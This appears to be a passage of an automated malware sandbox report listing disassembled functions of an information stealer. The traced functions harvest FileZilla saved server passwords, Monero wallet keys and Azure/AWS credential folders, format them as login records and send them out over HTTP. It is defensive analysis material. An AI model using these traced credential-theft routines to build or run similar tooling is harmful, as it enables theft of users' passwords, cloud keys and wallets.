                                • Instruction ID: 24c2d65279fab27aa2d2b187bb4aab459375f92156833b6b82d70ab8c8cc3fb2
                                • Opcode Fuzzy Hash: 2704ee246815c80507d76694ccd4031a1b20f9c3d8642067025737d814a4811a
                                • Instruction Fuzzy Hash: D051E7F3E086085BF314AE2DDC4576AB7D6DBC0720F1B853DDA8897B48F93D98058686
                                Function 00D99750 Relevance: .0, Instructions: 15COMMON
                                Download Yara Rule
                                Memory Dump Source
                                • Source File: 00000000.00000002.1795411098.0000000000D81000.00000040.00000001.01000000.00000003.sdmp, Offset: 00D80000, based on PE: true
                                • Associated: 00000000.00000002.1795391761.0000000000D80000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1795411098.0000000000E31000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1795411098.0000000000E3D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1795411098.0000000000E62000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1795411098.0000000000FCA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1795561532.0000000000FDE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1795561532.0000000001161000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1795561532.000000000123B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1795561532.000000000125E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1795561532.0000000001265000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1795561532.0000000001274000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1795862466.0000000001275000.00000080.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1795970084.000000000140C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1795984485.000000000140D000.00000080.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_d80000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: eecc59efbe9cdf3acfc8abb57b86a9aab05cbe8bc62256deaf8fcc3308cb31aa
                                • Instruction ID: abbdd297b848902a35704da264ecc4a7d2e6ec457c67c65f9fa5c7ab4ebdfac4
                                • Opcode Fuzzy Hash: eecc59efbe9cdf3acfc8abb57b86a9aab05cbe8bc62256deaf8fcc3308cb31aa
                                • Instruction Fuzzy Hash: 1EE04878A56608EFC740CF88D584E49B7F8EB0D720F1181D5ED099B721D235EE00EA90
                                Function 00D90250 Relevance: 68.6, APIs: 29, Strings: 10, Instructions: 366stringmemoryCOMMON
                                Download Yara Rule
                                APIs
                                  • Part of subcall function 00D9A740: lstrcpy.KERNEL32(00DA0E17,00000000), ref: 00D9A788
                                  • Part of subcall function 00D98DE0: SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?,?,000003E8), ref: 00D98E0B
                                  • Part of subcall function 00D9A920: lstrcpy.KERNEL32(00000000,?), ref: 00D9A972
                                  • Part of subcall function 00D9A920: lstrcat.KERNEL32(00000000), ref: 00D9A982
                                  • Part of subcall function 00D9A8A0: lstrcpy.KERNEL32(?,00DA0E17), ref: 00D9A905
                                  • Part of subcall function 00D9A9B0: lstrlen.KERNEL32(?,01829188,?,\Monero\wallet.keys,00DA0E17), ref: 00D9A9C5
                                  • Part of subcall function 00D9A9B0: lstrcpy.KERNEL32(00000000), ref: 00D9AA04
                                  • Part of subcall function 00D9A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 00D9AA12
                                  • Part of subcall function 00D9A7A0: lstrcpy.KERNEL32(?,00000000), ref: 00D9A7E6
                                  • Part of subcall function 00D899C0: CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 00D899EC
                                  • Part of subcall function 00D899C0: GetFileSizeEx.KERNEL32(000000FF,?), ref: 00D89A11
                                  • Part of subcall function 00D899C0: LocalAlloc.KERNEL32(00000040,?), ref: 00D89A31
                                  • Part of subcall function 00D899C0: ReadFile.KERNEL32(000000FF,?,00000000,00D8148F,00000000), ref: 00D89A5A
                                  • Part of subcall function 00D899C0: LocalFree.KERNEL32(00D8148F), ref: 00D89A90
                                  • Part of subcall function 00D899C0: CloseHandle.KERNEL32(000000FF), ref: 00D89A9A
                                  • Part of subcall function 00D98E30: LocalAlloc.KERNEL32(00000040,-00000001), ref: 00D98E52
                                • GetProcessHeap.KERNEL32(00000000,000F423F,00DA0DBA,00DA0DB7,00DA0DB6,00DA0DB3), ref: 00D90362
                                • RtlAllocateHeap.NTDLL(00000000), ref: 00D90369
                                • StrStrA.SHLWAPI(00000000,<Host>), ref: 00D90385
                                • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00DA0DB2), ref: 00D90393
                                • StrStrA.SHLWAPI(00000000,<Port>), ref: 00D903CF
                                • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00DA0DB2), ref: 00D903DD
                                • StrStrA.SHLWAPI(00000000,<User>), ref: 00D90419
                                • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00DA0DB2), ref: 00D90427
                                • StrStrA.SHLWAPI(00000000,<Pass encoding="base64">), ref: 00D90463
                                • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00DA0DB2), ref: 00D90475
                                • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00DA0DB2), ref: 00D90502
                                • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00DA0DB2), ref: 00D9051A
                                • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00DA0DB2), ref: 00D90532
                                • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00DA0DB2), ref: 00D9054A
                                • lstrcat.KERNEL32(?,browser: FileZilla), ref: 00D90562
                                • lstrcat.KERNEL32(?,profile: null), ref: 00D90571
                                • lstrcat.KERNEL32(?,url: ), ref: 00D90580
                                • lstrcat.KERNEL32(?,00000000), ref: 00D90593
                                • lstrcat.KERNEL32(?,00DA1678), ref: 00D905A2
                                • lstrcat.KERNEL32(?,00000000), ref: 00D905B5
                                • lstrcat.KERNEL32(?,00DA167C), ref: 00D905C4
                                • lstrcat.KERNEL32(?,login: ), ref: 00D905D3
                                • lstrcat.KERNEL32(?,00000000), ref: 00D905E6
                                • lstrcat.KERNEL32(?,00DA1688), ref: 00D905F5
                                • lstrcat.KERNEL32(?,password: ), ref: 00D90604
                                • lstrcat.KERNEL32(?,00000000), ref: 00D90617
                                • lstrcat.KERNEL32(?,00DA1698), ref: 00D90626
                                • lstrcat.KERNEL32(?,00DA169C), ref: 00D90635
                                • lstrlen.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00DA0DB2), ref: 00D9068E
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1795411098.0000000000D81000.00000040.00000001.01000000.00000003.sdmp, Offset: 00D80000, based on PE: true
                                • Associated: 00000000.00000002.1795391761.0000000000D80000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1795411098.0000000000E31000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1795411098.0000000000E3D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1795411098.0000000000E62000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1795411098.0000000000FCA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1795561532.0000000000FDE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1795561532.0000000001161000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1795561532.000000000123B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1795561532.000000000125E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1795561532.0000000001265000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1795561532.0000000001274000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1795862466.0000000001275000.00000080.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1795970084.000000000140C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1795984485.000000000140D000.00000080.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_d80000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: lstrcat$lstrlen$lstrcpy$FileLocal$AllocHeap$AllocateCloseCreateFolderFreeHandlePathProcessReadSize
                                • String ID: <Host>$<Pass encoding="base64">$<Port>$<User>$\AppData\Roaming\FileZilla\recentservers.xml$browser: FileZilla$login: $password: $profile: null$url:
                                • API String ID: 1942843190-555421843
                                • Opcode ID: 15eec723b0697d22f4ffe38e354bda1124902eab1c4d14ba4ce76e5690e32f6e
                                • Instruction ID: 1d9b7c555ec654151aeae875d8e4d6c6a968a6d8fd159105992a9f2732c9f6fc
                                • Opcode Fuzzy Hash: 15eec723b0697d22f4ffe38e354bda1124902eab1c4d14ba4ce76e5690e32f6e
                                • Instruction Fuzzy Hash: B8D10B76910208ABCF04EBE8DD96EEE7778FF15700F444518F102A7091DE74AA0ADBB2
                                Function 00D85960 Relevance: 39.0, APIs: 17, Strings: 5, Instructions: 495networkstringmemoryCOMMON
                                Download Yara Rule
                                APIs
                                  • Part of subcall function 00D9A7A0: lstrcpy.KERNEL32(?,00000000), ref: 00D9A7E6
                                  • Part of subcall function 00D847B0: lstrlen.KERNEL32(00000000,00000000,0000003C), ref: 00D84839
                                  • Part of subcall function 00D847B0: InternetCrackUrlA.WININET(00000000,00000000), ref: 00D84849
                                  • Part of subcall function 00D9A740: lstrcpy.KERNEL32(00DA0E17,00000000), ref: 00D9A788
                                • InternetOpenA.WININET(00000000,00000001,00000000,00000000,00000000), ref: 00D859F8
                                • StrCmpCA.SHLWAPI(?,0182EB68), ref: 00D85A13
                                • InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 00D85B93
                                • lstrlen.KERNEL32(00000000,00000000,?,00000000,00000000,?,",00000000,?,0182EA98,00000000,?,0182A7E0,00000000,?,00DA1A1C), ref: 00D85E71
                                • lstrlen.KERNEL32(00000000), ref: 00D85E82
                                • GetProcessHeap.KERNEL32(00000000,?), ref: 00D85E93
                                • RtlAllocateHeap.NTDLL(00000000), ref: 00D85E9A
                                • lstrlen.KERNEL32(00000000), ref: 00D85EAF
                                • lstrlen.KERNEL32(00000000), ref: 00D85ED8
                                • lstrlen.KERNEL32(00000000,00000000,00000000), ref: 00D85EF1
                                • lstrlen.KERNEL32(00000000,?,?), ref: 00D85F1B
                                • HttpSendRequestA.WININET(00000000,00000000,00000000), ref: 00D85F2F
                                • InternetReadFile.WININET(00000000,?,000000C7,?), ref: 00D85F4C
                                • InternetCloseHandle.WININET(00000000), ref: 00D85FB0
                                • InternetCloseHandle.WININET(00000000), ref: 00D85FBD
                                • HttpOpenRequestA.WININET(00000000,0182EB78,?,0182E1B0,00000000,00000000,00400100,00000000), ref: 00D85BF8
                                  • Part of subcall function 00D9A9B0: lstrlen.KERNEL32(?,01829188,?,\Monero\wallet.keys,00DA0E17), ref: 00D9A9C5
                                  • Part of subcall function 00D9A9B0: lstrcpy.KERNEL32(00000000), ref: 00D9AA04
                                  • Part of subcall function 00D9A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 00D9AA12
                                  • Part of subcall function 00D9A8A0: lstrcpy.KERNEL32(?,00DA0E17), ref: 00D9A905
                                  • Part of subcall function 00D9A920: lstrcpy.KERNEL32(00000000,?), ref: 00D9A972
                                  • Part of subcall function 00D9A920: lstrcat.KERNEL32(00000000), ref: 00D9A982
                                • InternetCloseHandle.WININET(00000000), ref: 00D85FC7
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1795411098.0000000000D81000.00000040.00000001.01000000.00000003.sdmp, Offset: 00D80000, based on PE: true
                                • Associated: 00000000.00000002.1795391761.0000000000D80000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1795411098.0000000000E31000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1795411098.0000000000E3D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1795411098.0000000000E62000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1795411098.0000000000FCA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1795561532.0000000000FDE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1795561532.0000000001161000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1795561532.000000000123B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1795561532.000000000125E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1795561532.0000000001265000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1795561532.0000000001274000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1795862466.0000000001275000.00000080.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1795970084.000000000140C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1795984485.000000000140D000.00000080.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_d80000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: lstrlen$Internet$lstrcpy$CloseHandle$HeapHttpOpenRequestlstrcat$AllocateConnectCrackFileProcessReadSend
                                • String ID: "$"$------$------$------
                                • API String ID: 874700897-2180234286
                                • Opcode ID: b3f232ad08535cd1838662858359b40f4a30dade073f316f78f8a1d32a94833b
                                • Instruction ID: e9111395e261f7fcdd071462ba11c11b20694841119cc4c57a6e2b13a6fc6310
                                • Opcode Fuzzy Hash: b3f232ad08535cd1838662858359b40f4a30dade073f316f78f8a1d32a94833b
                                • Instruction Fuzzy Hash: B312AD72920128ABDF15EBA4DD96FEEB378FF14700F504199B10A62091EF706A49CFB5
                                Function 00D8CEF0 Relevance: 30.4, APIs: 20, Instructions: 375stringmemoryfileCOMMON
                                Download Yara Rule
                                APIs
                                  • Part of subcall function 00D9A740: lstrcpy.KERNEL32(00DA0E17,00000000), ref: 00D9A788
                                  • Part of subcall function 00D9A9B0: lstrlen.KERNEL32(?,01829188,?,\Monero\wallet.keys,00DA0E17), ref: 00D9A9C5
                                  • Part of subcall function 00D9A9B0: lstrcpy.KERNEL32(00000000), ref: 00D9AA04
                                  • Part of subcall function 00D9A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 00D9AA12
                                  • Part of subcall function 00D9A8A0: lstrcpy.KERNEL32(?,00DA0E17), ref: 00D9A905
                                  • Part of subcall function 00D98B60: GetSystemTime.KERNEL32(00DA0E1A,0182A480,00DA05AE,?,?,00D813F9,?,0000001A,00DA0E1A,00000000,?,01829188,?,\Monero\wallet.keys,00DA0E17), ref: 00D98B86
                                  • Part of subcall function 00D9A920: lstrcpy.KERNEL32(00000000,?), ref: 00D9A972
                                  • Part of subcall function 00D9A920: lstrcat.KERNEL32(00000000), ref: 00D9A982
                                • CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 00D8CF83
                                • GetProcessHeap.KERNEL32(00000000,05F5E0FF), ref: 00D8D0C7
                                • RtlAllocateHeap.NTDLL(00000000), ref: 00D8D0CE
                                • lstrcat.KERNEL32(?,00000000), ref: 00D8D208
                                • lstrcat.KERNEL32(?,00DA1478), ref: 00D8D217
                                • lstrcat.KERNEL32(?,00000000), ref: 00D8D22A
                                • lstrcat.KERNEL32(?,00DA147C), ref: 00D8D239
                                • lstrcat.KERNEL32(?,00000000), ref: 00D8D24C
                                • lstrcat.KERNEL32(?,00DA1480), ref: 00D8D25B
                                • lstrcat.KERNEL32(?,00000000), ref: 00D8D26E
                                • lstrcat.KERNEL32(?,00DA1484), ref: 00D8D27D
                                • lstrcat.KERNEL32(?,00000000), ref: 00D8D290
                                • lstrcat.KERNEL32(?,00DA1488), ref: 00D8D29F
                                • lstrcat.KERNEL32(?,00000000), ref: 00D8D2B2
                                • lstrcat.KERNEL32(?,00DA148C), ref: 00D8D2C1
                                • lstrcat.KERNEL32(?,00000000), ref: 00D8D2D4
                                • lstrcat.KERNEL32(?,00DA1490), ref: 00D8D2E3
                                  • Part of subcall function 00D9A820: lstrlen.KERNEL32(00D84F05,?,?,00D84F05,00DA0DDE), ref: 00D9A82B
                                  • Part of subcall function 00D9A820: lstrcpy.KERNEL32(00DA0DDE,00000000), ref: 00D9A885
                                • lstrlen.KERNEL32(?), ref: 00D8D32A
                                • lstrlen.KERNEL32(?), ref: 00D8D339
                                  • Part of subcall function 00D9AA70: StrCmpCA.SHLWAPI(01828F98,00D8A7A7,?,00D8A7A7,01828F98), ref: 00D9AA8F
                                • DeleteFileA.KERNEL32(00000000), ref: 00D8D3B4
                                Memory Dump Source
                                • Source File: 00000000.00000002.1795411098.0000000000D81000.00000040.00000001.01000000.00000003.sdmp, Offset: 00D80000, based on PE: true
                                • Associated: 00000000.00000002.1795391761.0000000000D80000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1795411098.0000000000E31000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1795411098.0000000000E3D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1795411098.0000000000E62000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1795411098.0000000000FCA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1795561532.0000000000FDE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1795561532.0000000001161000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1795561532.000000000123B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1795561532.000000000125E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1795561532.0000000001265000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1795561532.0000000001274000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1795862466.0000000001275000.00000080.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1795970084.000000000140C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1795984485.000000000140D000.00000080.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_d80000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: lstrcat$lstrcpy$lstrlen$FileHeap$AllocateCopyDeleteProcessSystemTime
                                • String ID:
                                • API String ID: 1956182324-0
                                • Opcode ID: 6801593242737500f8a93fc1a603fe38b8a2469411dd32ba72bf2308c665e6d7
                                • Instruction ID: 097c5306ed664a093304f7885c60a566881c395115264b616f28b4437aa64b3a
                                • Opcode Fuzzy Hash: 6801593242737500f8a93fc1a603fe38b8a2469411dd32ba72bf2308c665e6d7
                                • Instruction Fuzzy Hash: 13E1F972910118ABCF04EBA8DE96EEE7379FF14305F104158F106A7091DE35BA09DBB6
                                Function 00D8C990 Relevance: 24.9, APIs: 13, Strings: 1, Instructions: 384filestringCOMMON
                                Download Yara Rule
                                APIs
                                  • Part of subcall function 00D9A740: lstrcpy.KERNEL32(00DA0E17,00000000), ref: 00D9A788
                                  • Part of subcall function 00D9A920: lstrcpy.KERNEL32(00000000,?), ref: 00D9A972
                                  • Part of subcall function 00D9A920: lstrcat.KERNEL32(00000000), ref: 00D9A982
                                  • Part of subcall function 00D9A8A0: lstrcpy.KERNEL32(?,00DA0E17), ref: 00D9A905
                                  • Part of subcall function 00D9A9B0: lstrlen.KERNEL32(?,01829188,?,\Monero\wallet.keys,00DA0E17), ref: 00D9A9C5
                                  • Part of subcall function 00D9A9B0: lstrcpy.KERNEL32(00000000), ref: 00D9AA04
                                  • Part of subcall function 00D9A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 00D9AA12
                                • CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000,00000000,?,0182CE10,00000000,?,00DA144C,00000000,?,?), ref: 00D8CA6C
                                • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000002), ref: 00D8CA89
                                • GetFileSize.KERNEL32(00000000,00000000), ref: 00D8CA95
                                • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000000), ref: 00D8CAA8
                                • ReadFile.KERNEL32(00000000,?,00000000,?,00000000), ref: 00D8CAD9
                                • StrStrA.SHLWAPI(?,0182CFC0,00DA0B52), ref: 00D8CAF7
                                • StrStrA.SHLWAPI(00000000,0182CE28), ref: 00D8CB1E
                                • StrStrA.SHLWAPI(?,0182D8C0,00000000,?,00DA1458,00000000,?,00000000,00000000,?,01829088,00000000,?,00DA1454,00000000,?), ref: 00D8CCA2
                                • StrStrA.SHLWAPI(00000000,0182D9E0), ref: 00D8CCB9
                                  • Part of subcall function 00D8C820: lstrlen.KERNEL32(?,00000001,?,00000000,00000000,00000000), ref: 00D8C871
                                  • Part of subcall function 00D8C820: CryptStringToBinaryA.CRYPT32(?,00000000), ref: 00D8C87C
                                • StrStrA.SHLWAPI(?,0182D9E0,00000000,?,00DA145C,00000000,?,00000000,01829048), ref: 00D8CD5A
                                • StrStrA.SHLWAPI(00000000,01829138), ref: 00D8CD71
                                  • Part of subcall function 00D8C820: lstrcat.KERNEL32(?,00DA0B46), ref: 00D8C943
                                  • Part of subcall function 00D8C820: lstrcat.KERNEL32(?,00DA0B47), ref: 00D8C957
                                  • Part of subcall function 00D8C820: lstrcat.KERNEL32(?,00DA0B4E), ref: 00D8C978
                                • lstrlen.KERNEL32(00000000), ref: 00D8CE44
                                • CloseHandle.KERNEL32(00000000), ref: 00D8CE9C
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1795411098.0000000000D81000.00000040.00000001.01000000.00000003.sdmp, Offset: 00D80000, based on PE: true
                                • Associated: 00000000.00000002.1795391761.0000000000D80000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1795411098.0000000000E31000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1795411098.0000000000E3D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1795411098.0000000000E62000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1795411098.0000000000FCA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1795561532.0000000000FDE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1795561532.0000000001161000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1795561532.000000000123B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1795561532.000000000125E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1795561532.0000000001265000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1795561532.0000000001274000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1795862466.0000000001275000.00000080.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1795970084.000000000140C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1795984485.000000000140D000.00000080.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_d80000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: Filelstrcat$lstrcpy$lstrlen$Pointer$BinaryCloseCreateCryptHandleReadSizeString
                                • String ID:
                                • API String ID: 3744635739-3916222277
                                • Opcode ID: 9bf20a94f85d19f025ac2c08e29a0304cf835d5c6cd6e5bcb54fd8cf4957c86e
                                • Instruction ID: 416d7bd0d8a7c8a333e98a17b7dd5d6bb39f601ef2aac690453a8a517e28becb
                                • Opcode Fuzzy Hash: 9bf20a94f85d19f025ac2c08e29a0304cf835d5c6cd6e5bcb54fd8cf4957c86e
                                • Instruction Fuzzy Hash: A4E1C572910118ABDF15EBA8DD96FEEB778EF14304F404159F106A7191EE306A4ACBB2
                                Function 00D98320 Relevance: 24.7, APIs: 11, Strings: 3, Instructions: 196registryCOMMON
                                Download Yara Rule
                                APIs
                                  • Part of subcall function 00D9A740: lstrcpy.KERNEL32(00DA0E17,00000000), ref: 00D9A788
                                • RegOpenKeyExA.ADVAPI32(00000000,0182B048,00000000,00020019,00000000,00DA05B6), ref: 00D983A4
                                • RegEnumKeyExA.ADVAPI32(00000000,00000000,?,00000400,00000000,00000000,00000000,00000000), ref: 00D98426
                                • wsprintfA.USER32 ref: 00D98459
                                • RegOpenKeyExA.ADVAPI32(00000000,?,00000000,00020019,00000000), ref: 00D9847B
                                • RegCloseKey.ADVAPI32(00000000), ref: 00D9848C
                                • RegCloseKey.ADVAPI32(00000000), ref: 00D98499
                                  • Part of subcall function 00D9A7A0: lstrcpy.KERNEL32(?,00000000), ref: 00D9A7E6
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1795411098.0000000000D81000.00000040.00000001.01000000.00000003.sdmp, Offset: 00D80000, based on PE: true
                                • Associated: 00000000.00000002.1795391761.0000000000D80000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1795411098.0000000000E31000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1795411098.0000000000E3D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1795411098.0000000000E62000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1795411098.0000000000FCA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1795561532.0000000000FDE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1795561532.0000000001161000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1795561532.000000000123B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1795561532.000000000125E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1795561532.0000000001265000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1795561532.0000000001274000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1795862466.0000000001275000.00000080.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1795970084.000000000140C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1795984485.000000000140D000.00000080.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_d80000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: CloseOpenlstrcpy$Enumwsprintf
                                • String ID: - $%s\%s$?
                                • API String ID: 3246050789-3278919252
                                • Opcode ID: a0cd37d91b5dfef83d9661ddee4ed8418ae9afd91a98dadf05a298b7d2f28391
                                • Instruction ID: 26584d4413597daf4b422ab509d65438b99d2cae5eb992151d06b875013577cc
                                • Opcode Fuzzy Hash: a0cd37d91b5dfef83d9661ddee4ed8418ae9afd91a98dadf05a298b7d2f28391
                                • Instruction Fuzzy Hash: 9F81EA7291012CABDB24DB54CD95FEAB7B8FF08704F008699E109A6180DF756A85DFF1
                                Function 00D94D70 Relevance: 22.6, APIs: 6, Strings: 9, Instructions: 123stringCOMMON
                                Download Yara Rule
                                APIs
                                  • Part of subcall function 00D98DE0: SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?,?,000003E8), ref: 00D98E0B
                                • lstrcat.KERNEL32(?,00000000), ref: 00D94DB0
                                • lstrcat.KERNEL32(?,\.azure\), ref: 00D94DCD
                                  • Part of subcall function 00D94910: wsprintfA.USER32 ref: 00D9492C
                                  • Part of subcall function 00D94910: FindFirstFileA.KERNEL32(?,?), ref: 00D94943
                                • lstrcat.KERNEL32(?,00000000), ref: 00D94E3C
                                • lstrcat.KERNEL32(?,\.aws\), ref: 00D94E59
                                  • Part of subcall function 00D94910: StrCmpCA.SHLWAPI(?,00DA0FDC), ref: 00D94971
                                  • Part of subcall function 00D94910: StrCmpCA.SHLWAPI(?,00DA0FE0), ref: 00D94987
                                  • Part of subcall function 00D94910: FindNextFileA.KERNEL32(000000FF,?), ref: 00D94B7D
                                  • Part of subcall function 00D94910: FindClose.KERNEL32(000000FF), ref: 00D94B92
                                • lstrcat.KERNEL32(?,00000000), ref: 00D94EC8
                                • lstrcat.KERNEL32(?,\.IdentityService\), ref: 00D94EE5
                                  • Part of subcall function 00D94910: wsprintfA.USER32 ref: 00D949B0
                                  • Part of subcall function 00D94910: StrCmpCA.SHLWAPI(?,00DA08D2), ref: 00D949C5
